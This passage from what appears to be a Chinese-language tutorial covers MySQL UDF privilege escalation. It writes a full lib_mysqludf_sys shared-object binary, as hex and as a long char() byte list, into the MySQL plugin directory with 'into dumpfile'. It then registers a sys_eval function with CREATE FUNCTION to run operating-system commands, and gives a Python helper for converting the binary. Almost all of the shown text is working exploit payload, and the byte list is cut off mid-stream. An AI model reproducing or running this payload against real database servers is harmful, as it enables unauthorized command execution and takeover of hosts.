10000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000 into dumpfile '/usr/local/mysql/lib/plugin/lib_mysqludf_sys_64.so';

通过 dll 文件创建函数

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys_64.so';

创建成功后就可以直接执行命令了,可以看到是 www 权限

8.1.2 ascii 码写入

写一个 python 脚本将 lib_mysqludf_sys_64.dll 的文件内容转化为 ascii 码

import binasciiimport numpy as npimport rewith open('lib_mysqludf_sys_64.so', 'rb') as f:    a = f.read()asc1 = np.frombuffer(a, dtype=np.uint8)asc = asc1.tolist()print(asc)

转化好之后再用 sql 语句写入

# 这里只能用into dumpfile,不能用into outfile,因为into outfile函数会在行末端写入新行,更致命的是会转义换行符,这样的话这个二进制可执行文件就会被破坏select char(127, 69, 76, 70, 2, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 62, 0, 1, 0, 0, 0, 208, 12, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 232, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 56, 0, 5, 0, 64, 0, 26, 0, 25, 0, 1, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 20, 21, 0, 0, 0, 0, 0, 0, 20, 21, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 0, 0, 0, 1, 0, 0, 0, 6, 0, 0, 0, 24, 21, 0, 0, 0, 0, 0, 0, 24, 21, 32, 0, 0, 0, 0, 0, 24, 21, 32, 0, 0, 0, 0, 0, 112, 2, 0, 0, 0, 0, 0, 0, 128, 2, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 0, 0, 0, 2, 0, 0, 0, 6, 0, 0, 0, 64, 21, 0, 0, 0, 0, 0, 0, 64, 21, 32, 0, 0, 0, 0, 0, 64, 21, 32, 0, 0, 0, 0, 0, 144, 1, 0, 0, 0, 0, 0, 0, 144, 1, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 80, 229, 116, 100, 4, 0, 0, 0, 100, 18, 0, 0, 0, 0, 0, 0, 100, 18, 0, 0, 0, 0, 0, 0, 100, 18, 0, 0, 0, 0, 0, 0, 156, 0, 0, 0, 0, 0, 0, 0, 156, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 81, 229, 116, 100, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 37, 0, 0, 0, 43, 0, 0, 0, 21, 0, 0, 0, 5, 0, 0, 0, 40, 0, 0, 0, 30, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 12, 0, 0, 0, 0, 0, 0, 0, 7, 0, 0, 0, 42, 0, 0, 0, 9, 0, 0, 0, 33, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 39, 0, 0, 0, 11, 0, 0, 0, 34, 0, 0, 0, 24, 0, 0, 0, 36, 0, 0, 0, 14, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 29, 0, 0, 0, 22, 0, 0, 0, 0, 0, 0, 0, 19, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 18, 0, 0, 0, 35, 0, 0, 0, 16, 0, 0, 0, 37, 0, 0, 0, 26, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 27, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 41, 0, 0, 0, 20, 0, 0, 0, 0, 0, 0, 0, 25, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 10, 0, 0, 0, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 13, 0, 0, 0, 38, 0, 0, 0, 23, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 28, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 20, 0, 0, 0, 2, 0, 0, 0, 7, 0, 0, 0, 128, 8, 3, 73, 145, 25, 196, 201, 61, 164, 64, 3, 152, 4, 104, 131, 20, 0, 0, 0, 22, 0, 0, 0, 23, 0, 0, 0, 25, 0, 0, 0, 27, 0, 0, 0, 29, 0, 0, 0, 32, 0, 0, 0, 34, 0, 0, 0, 0, 0, 0, 0, 35, 0, 0, 0, 0, 0, 0, 0, 36, 0, 0, 0, 37, 0, 0, 0, 39, 0, 0, 0, 41, 0, 0, 0, 42, 0, 0, 0, 0, 0, 0, 0, 206, 44, 192, 186, 103, 60, 118, 144, 235, 211, 239, 14, 120, 114, 39, 136, 185, 141, 241, 14, 216, 113, 88, 28, 193, 226, 247, 222, 168, 104, 190, 18, 187, 227, 146, 124, 126, 139, 146, 205, 30, 112, 102, 169, 195, 249, 191, 186, 116, 91, 176, 115, 55, 25, 116, 236, 67, 69, 213, 236, 197, 166, 44, 28, 195, 19, 138, 255, 54, 172, 104, 174, 59, 159, 212, 160, 172, 115, 209, 197, 37, 104, 27, 50, 11, 89, 17, 254, 171, 95, 190, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 9, 0, 160, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 37, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 224, 0, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 222, 1, 0, 0, 0, 0, 0, 0, 121, 1, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 119, 0, 0, 0, 0, 0, 0, 0, 186, 0, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 53, 4, 0, 0, 0, 0, 0, 0, 245, 0, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 194, 1, 0, 0, 0, 0, 0, 0, 158, 1, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 217, 0, 0, 0, 0, 0, 0, 0, 251, 0, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 22, 0, 0, 0, 34, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 254, 0, 0, 0, 0, 0, 0, 0, 207, 0, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 173, 0, 0, 0, 0, 0, 0, 0, 136, 1, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0, 0, 0, 0, 0, 171, 1, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 37, 1, 0, 0, 0, 0, 0, 0, 16, 1, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 220, 0, 0, 0, 0, 0, 0, 0, 199, 0, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 194, 0, 0, 0, 0, 0, 0, 0, 181, 0, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 204, 2, 0, 0, 0, 0, 0, 0, 237, 0, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 232, 2, 0, 0, 0, 0, 0, 0, 231, 0, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 155, 0, 0, 0, 0, 0, 0, 0, 194, 0, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 40, 0, 0, 0, 0, 0, 0, 0, 128, 1, 0, 0, 18, 0, 11, 0, 122, 16, 0, 0, 0, 0, 0, 0, 110, 0, 0, 0, 0, 0, 0, 0, 117, 0, 0, 0, 18, 0, 11, 0, 167, 13, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 18, 0, 12, 0, 120, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 63, 1, 0, 0, 18, 0, 11, 0, 26, 16, 0, 0, 0, 0, 0, 0, 45, 0, 0, 0, 0, 0, 0, 0, 31, 1, 0, 0, 18, 0, 9, 0, 160, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 195, 1, 0, 0, 16, 0, 241, 255, 136, 23, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 150, 0, 0, 0, 18, 0, 11, 0, 171, 13, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 112, 1, 0, 0, 18, 0, 11, 0, 102, 16, 0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 0, 0, 0, 0, 207, 1, 0, 0, 16, 0, 241, 255, 152, 23, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 86, 0, 0, 0, 18, 0, 11, 0, 165, 13, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 2, 1, 0, 0, 18, 0, 11, 0, 46, 15, 0, 0, 0, 0, 0, 0, 41, 0, 0, 0, 0, 0, 0, 0, 163, 1, 0, 0, 18, 0, 11, 0, 247, 16, 0, 0, 0, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 18, 0, 11, 0, 164, 13, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 50, 1, 0, 0, 18, 0, 11, 0, 234, 15, 0, 0, 0, 0, 0, 0, 48, 0, 0, 0, 0, 0, 0, 0, 188, 1, 0, 0, 16, 0, 241, 255, 136, 23, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 101, 0, 0, 0, 18, 0, 11, 0, 166, 13, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 37, 1, 0, 0, 18, 0, 11, 0, 128, 15, 0, 0, 0, 0, 0, 0, 106, 0, 0, 0, 0, 0, 0, 0, 133, 0, 0, 0, 18, 0, 11, 0, 168, 13, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 23, 1, 0, 0, 18, 0, 11, 0, 87, 15, 0, 0, 0, 0, 0, 0, 41, 0, 0, 0, 0, 0, 0, 0, 85, 1, 0, 0, 18, 0, 11, 0, 71, 16, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 169, 0, 0, 0, 18, 0, 11, 0, 172, 13, 0, 0, 0, 0, 0, 0, 154, 0, 0, 0, 0, 0, 0, 0, 143, 1, 0, 0, 18, 0, 11, 0, 232, 16, 0, 0, 0, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 215, 0, 0, 0, 18, 0, 11, 0, 70, 14, 0, 0, 0, 0, 0, 0, 232, 0, 0, 0, 0, 0, 0, 0, 0, 95, 95, 103, 109, 111, 110, 95, 115, 116, 97, 114, 116, 95, 95, 0, 95, 102, 105, 110, 105, 0, 95, 95, 99, 120, 97, 95, 102, 105, 110, 97, 108, 105, 122, 101, 0, 95, 74, 118, 95, 82, 101, 103, 105, 115, 116, 101, 114, 67, 108, 97, 115, 115, 101, 115, 0, 108, 105, 98, 95, 109, 121, 115, 113, 108, 117, 100, 102, 95, 115, 121, 115, 95, 105, 110, 102, 111, 95, 100, 101, 105, 110, 105, 116, 0, 115, 121, 115, 95, 103, 101, 116, 95, 100, 101, 105, 110, 105, 116, 0, 115, 121, 115, 95, 101, 120, 101, 99, 95, 100, 101, 105, 110, 105, 116, 0, 115, 121, 115, 95, 101, 118, 97, 108, 95, 100, 101, 105, 110, 105, 116, 0, 115, 121, 115, 95, 98, 105, 110, 101, 118, 97, 108, 95, 105, 110, 105, 116, 0, 115, 121, 115, 95, 98, 105, 110, 101, 118, 97, 108, 95, 100, 101, 105, 110, 105, 116, 0, 115, 121, 115, 95, 98, 105, 110, 101, 118, 97, 108, 0, 102, 111, 114, 107, 0, 115, 121, 115, 99, 111, 110, 102, 0, 109, 109, 97, 112, 0, 115, 116, 114, 110, 99, 112, 121, 0, 119, 97, 105, 116, 112, 105, 100, 0, 115, 121, 115, 95, 101, 118, 97, 108, 0, 109, 97, 108, 108, 111, 99, 0, 112, 111, 112, 101, 110, 0, 114, 101, 97, 108, 108, 111, 99, 0, 102, 103, 101, 116, 115, 0, 112, 99, 108, 111, 115, 101, 0, 115, 121, 115, 95, 101, 118, 97, 108, 95, 105, 110, 105, 116, 0, 115, 116, 114, 99, 112, 121, 0, 115, 121, 115, 95, 101, 120, 101, 99, 95, 105, 110, 105, 116, 0, 115, 121, 115, 95, 115, 101, 116, 95, 105, 110, 105, 116, 0, 115, 121, 115, 95, 103, 101, 116, 95, 105, 110, 105, 116, 0, 108, 105, 98, 95, 109, 121, 115, 113, 108, 117, 100, 102, 95, 115, 121, 115, 95, 105, 110, 102, 111, 0, 108, 105, 98, 95, 109, 121, 115, 113, 108, 117, 100, 102, 95, 115, 121, 115, 95, 105, 110, 102, 111, 95, 105, 110, 105, 116, 0, 115, 121, 115, 95, 101, 120, 101, 99, 0, 115, 121, 115, 116, 101, 109, 0, 115, 121, 115, 95, 115, 101, 116, 0, 115, 101, 116, 101, 110, 118, 0, 115, 121, 115, 95, 115, 101, 116, 95, 100, 101, 105, 110, 105, 116, 0, 102, 114, 101, 101, 0, 115, 121, 115, 95, 103, 101, 116, 0, 103, 101, 116, 101, 110, 118, 0, 108, 105, 98, 99, 46, 115, 111, 46, 54, 0, 95, 101, 100, 97, 116, 97, 0, 95, 95, 98, 115, 115, 95, 115, 116, 97, 114, 116, 0, 95, 101, 110, 100, 0, 71, 76, 73, 66, 67, 95, 50, 46, 50, 46, 53, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 178, 1, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 117, 26, 105, 9, 0, 0, 2, 0, 212, 1, 0, 0, 0, 0, 0, 0, 128, 23, 32, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 128, 23, 32, 0, 0, 0, 0, 0, 208, 22, 32, 0, 0, 0, 0, 0, 6, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 216, 22, 32, 0, 0, 0, 0, 0, 6, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 224, 22, 32, 0, 0, 0, 0, 0, 6, 0, 0, 0, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 23, 32, 0, 0, 0, 0, 0, 7, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 23, 32, 0, 0, 0, 0, 0, 7, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16, 23, 32, 0, 0, 0, 0, 0, 7, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 23, 32, 0, 0, 0, 0, 0, 7, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 23, 32, 0, 0, 0, 0, 0, 7, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 40, 23, 32, 0, 0, 0, 0, 0, 7, 0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 48, 23, 32, 0, 0, 0, 0, 0, 7, 0, 0, 0, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 56, 23, 32, 0, 0, 0, 0, 0, 7, 0, 0, 0, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 23, 32, 0, 0, 0, 0, 0, 7, 0, 0, 0, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 72, 23, 32, 0, 0, 0, 0, 0, 7, 0, 0, 0, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 80, 23, 32, 0, 0, 0, 0, 0, 7, 0, 0, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 88, 23, 32, 0, 0, 0, 0, 0, 7, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 96, 23, 32, 0, 0, 0, 0, 0, 7, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 104, 23, 32, 0, 0, 0, 0, 0, 7, 0, 0, 0, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 112, 23, 32, 0, 0, 0, 0, 0, 7, 0, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 120, 23, 32, 0, 0, 0, 0, 0, 7, 0, 0, 0, 19, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 72, 131, 236, 8, 232, 39, 1, 0, 0, 232, 194, 1, 0, 0, 232, 141, 5, 0, 0, 72, 131, 196, 8, 195, 255, 53, 50, 11, 32, 0, 255, 37, 52, 11, 32, 0, 15, 31, 64, 0, 255, 37, 50, 11, 32, 0, 104, 0, 0, 0, 0, 233, 224, 255, 255, 255, 255, 37, 42, 11, 32, 0, 104, 1, 0, 0, 0, 233, 208, 255, 255, 255, 255, 37, 34, 11, 32, 0, 104, 2, 0, 0, 0, 233, 192, 255, 255, 255, 255, 37, 26, 11, 32, 0, 104, 3, 0, 0, 0, 233, 176, 255, 255, 255, 255, 37, 18, 11, 32, 0, 104, 4, 0, 0, 0, 233, 160, 255, 255, 255, 255, 37, 10, 11, 32, 0, 104, 5, 0, 0, 0, 233, 144, 255, 255, 255, 255, 37, 2, 11, 32, 0, 104, 6, 0, 0, 0, 233, 128, 255, 255, 255, 255, 37, 250, 10, 32, 0, 104, 7, 0, 0, 0, 233, 112, 255, 255, 255, 255, 37, 242, 10, 32, 0, 104, 8, 0, 0, 0, 233, 96, 255, 255, 255, 255, 37, 234, 10, 32, 0, 104, 9, 0, 0, 0, 233, 80, 255, 255, 255, 255, 37, 226, 10, 32, 0, 104, 10, 0, 0, 0, 233, 64, 255, 255, 255, 255, 37, 218, 10, 32, 0, 104, 11, 0, 0, 0, 233, 48, 255, 255, 255, 255, 37, 210, 10, 32, 0, 104, 12, 0, 0, 0, 233, 32, 255, 255, 255, 255, 37, 202, 10, 32, 0, 104, 13, 0, 0, 0, 233, 16, 255, 255, 255, 255, 37, 194, 10, 32, 0, 104, 14, 0, 0, 0, 233, 0, 255, 255, 255, 255, 37, 186, 10, 32, 0, 104, 15, 0, 0, 0, 233, 240, 254, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 72, 131, 236, 8, 72, 139, 5, 245, 9, 32, 0, 72, 133, 192, 116, 2, 255, 208, 72, 131, 196, 8, 195, 144, 144, 144, 144, 144, 144, 144, 144, 144, 85, 128, 61, 144, 10, 32, 0, 0, 72, 137, 229, 65, 84, 83, 117, 98, 72, 131, 61, 216, 9, 32, 0, 0, 116, 12, 72, 139, 61, 111, 10, 32, 0, 232, 18, 255, 255, 255, 72, 141, 5, 19, 8, 32, 0, 76, 141, 37, 4, 8, 32, 0, 72, 139, 21, 101, 10, 32, 0, 76, 41, 224, 72, 193, 248, 3, 72, 141, 88, 255, 72, 57, 218, 115, 32, 15, 31, 68, 0, 0, 72, 141, 66, 1, 72, 137, 5, 69, 10, 32, 0, 65, 255, 20, 196, 72, 139, 21, 58, 10, 32, 0, 72, 57, 218, 114, 229, 198, 5, 38, 10, 32, 0, 1, 91, 65, 92, 201, 195, 102, 15, 31, 132, 0, 0, 0, 0, 0, 85, 72, 131, 61, 191, 7, 32, 0, 0, 72, 137, 229, 116, 34, 72, 139, 5, 83, 9, 32, 0, 72, 133, 192, 116, 22, 72, 141, 61, 167, 7, 32, 0, 73, 137, 195, 201, 65, 255, 227, 15, 31, 132, 0, 0, 0, 0, 0, 201, 195, 144, 144, 195, 195, 195, 195, 49, 192, 195, 195, 65, 84, 72, 131, 201, 255, 73, 137, 244, 85, 83, 72, 131, 236, 16, 72, 139, 70, 16, 72, 139, 56, 49, 192, 242, 174, 72, 247, 209, 72, 141, 105, 255, 232, 182, 254, 255, 255, 131, 248, 0, 137, 199, 124, 97, 117, 79, 191, 30, 0, 0, 0, 232, 3, 254, 255, 255, 72, 141, 112, 255, 69, 49, 201, 69, 49, 192, 49, 255, 185, 33, 0, 0, 0, 186, 7, 0, 0, 0, 72, 141, 4, 46, 72, 247, 214, 72, 33, 198, 232, 174, 254, 255, 255, 72, 131, 248, 255, 72, 137, 195, 116, 39, 73, 139, 68, 36, 16, 72, 137, 234, 72, 137, 223, 72, 139, 48, 232, 82, 254, 255, 255, 255, 211, 235, 12, 186, 1, 0, 0, 0, 49, 246, 232, 2, 254, 255, 255, 49, 192, 235, 5, 184, 1, 0, 0, 0, 90, 89, 91, 93, 65, 92, 195, 65, 87, 191, 0, 4, 0, 0, 65, 86, 65, 85, 69, 49, 237, 65, 84, 85, 83, 72, 137, 243, 72, 131, 236, 24, 72, 137, 76, 36, 16, 76, 137, 68, 36, 8, 232, 90, 253, 255, 255, 191, 1, 0, 0, 0, 73, 137, 198, 232, 77, 253, 255, 255, 198, 0, 0, 72, 137, 197, 72, 139, 67, 16, 72, 141, 53, 106, 3, 0, 0, 72, 139, 56, 232, 20, 254, 255, 255, 73, 137, 199, 235, 55, 76, 137, 247, 49, 192, 72, 131, 201, 255, 242, 174, 72, 137, 239, 72, 247, 209, 72, 141, 89, 255, 77, 141, 100, 29, 0, 76, 137, 230, 232, 221, 253, 255, 255, 74, 141, 60, 40, 72, 137, 218, 76, 137, 246, 77, 137, 229, 72, 137, 197, 232, 168, 253, 255, 255, 76, 137, 250, 190, 8, 0, 0, 0, 76, 137, 247, 232, 24, 253, 255, 255, 72, 133, 192, 117, 180, 76, 137, 255, 232, 43, 253, 255, 255, 128, 125, 0, 0, 117, 10, 72, 139, 68, 36, 8, 198, 0, 1, 235, 31, 66, 198, 68, 45, 255, 0, 49, 192, 72, 131, 201, 255, 72, 137, 239, 242, 174, 72, 139, 68, 36, 16, 72, 247, 209, 72, 255, 201, 72, 137, 8, 72, 131, 196, 24, 72, 137, 232, 91, 93, 65, 92, 65, 93, 65, 94, 65, 95, 195, 72, 131, 236, 8, 131, 62, 1, 72, 137, 215, 117, 11, 72, 139, 70, 8, 49, 210, 131, 56, 0, 116, 14, 72, 141, 53, 58, 2, 0, 0, 232, 23, 253, 255, 255, 178, 1, 136, 208, 94, 195, 72, 131, 236, 8, 131, 62, 1, 72, 137, 215, 117, 11, 72, 139, 70, 8, 49, 210, 131, 56, 0, 116, 14, 72, 141, 53, 17, 2, 0, 0, 232, 238, 252, 255, 255, 178, 1, 136, 208, 95, 195, 85, 72, 137, 253, 83, 72, 137, 211, 72, 131, 236, 8, 131, 62, 2, 116, 9, 72, 141, 53, 25, 2, 0, 0, 235, 63, 72, 139, 70, 8, 131, 56, 0, 116, 9, 72, 141, 53, 38, 2, 0, 0, 235, 45, 199, 64, 4, 0, 0, 0, 0, 72, 139, 70, 24, 72, 139, 56, 72, 131, 199, 2, 72, 3, 120, 8, 232, 1, 252, 255, 255, 49, 210, 72, 133, 192, 72, 137, 69, 16, 117, 17, 72, 141, 53, 31, 2, 0, 0, 72, 137, 223, 232, 135, 252, 255, 255, 178, 1, 65, 88, 91, 136, 208, 93, 195, 72, 131, 236, 8, 131, 62, 1, 72, 137, 249, 72, 137, 215, 117, 16, 72, 139, 70, 8, 131, 56, 0, 117, 7, 198, 1, 1, 49, 192, 235, 14, 72, 141, 53, 118, 1, 0, 0, 232, 83, 252, 255, 255, 176, 1, 65, 89, 195, 65, 84, 72, 141, 53, 239, 1, 0, 0, 73, 137, 204, 72, 137, 215, 83, 72, 137, 211, 72, 131, 236, 8, 232, 50, 252, 255, 255, 73, 199, 4, 36, 30, 0, 0, 0, 72, 137, 216, 65, 90, 91, 65, 92, 195, 72, 131, 236, 8, 49, 192, 131, 62, 0, 72, 137, 215, 116, 14, 72, 141, 53, 213, 1, 0, 0, 232, 7, 252, 255, 255, 176, 1, 65, 91, 195, 72, 131, 236, 8, 72, 139, 70, 16, 72, 139, 56, 232, 98, 251, 255, 255, 90, 72, 152, 195, 72, 131, 236, 40, 72, 139, 70, 24, 76, 139, 79, 16, 73, 137, 242, 72, 139, 8, 72, 139, 70, 16, 76, 137, 207, 72, 139, 0, 77, 141, 68, 9, 1, 72, 137, 198, 243, 164, 76, 137, 199, 73, 139, 66, 24, 72, 139, 0, 65, 198, 4, 1, 0, 73, 139, 66, 16, 73, 139, 82, 24, 72, 139, 64, 8, 72, 139, 74, 8, 186, 1, 0, 0, 0, 72, 137, 198, 243, 164, 76, 137, 198, 76, 137, 207, 73, 139, 66, 24, 72, 139, 64, 8, 65, 198, 4, 0, 0, 232, 103, 251, 255, 255, 72, 131, 196, 40, 72, 152, 195, 72, 139, 127, 16, 72, 133, 255, 116, 5, 233, 18, 251, 255, 255, 195, 85, 72, 137, 205, 83, 76, 137, 195, 72, 131, 236, 8, 72, 139, 70, 16, 72, 139, 56, 232, 73, 251, 255, 255, 72, 133, 192, 72, 137, 194, 117, 5, 198, 3, 1, 235, 21, 49, 192, 72, 131, 201, 255, 72, 137, 215, 242, 174, 72, 247, 209, 72, 255, 201, 72, 137, 77, 0, 89, 91, 72, 137, 208, 93, 195, 144, 144, 144, 144, 144, 144, 144, 144, 85, 72, 137, 229, 83, 72, 131, 236, 8, 72, 139, 5, 200, 3, 32, 0, 72, 131, 248, 255, 116, 25, 72, 141, 29, 187, 3, 32, 0, 15, 31, 0, 72, 131, 235, 8, 255, 208, 72, 139, 3, 72, 131, 248, 255, 117, 241, 72, 131, 196, 8, 91, 201, 195, 144, 144, 72, 131, 236, 8, 232, 111, 251, 255, 255, 72, 131, 196, 8, 195, 69, 120, 112, 101, 99, 116, 101, 100, 32, 101, 120, 97, 99, 116, 108, 121, 32, 111, 110, 101, 32, 115, 116, 114, 105, 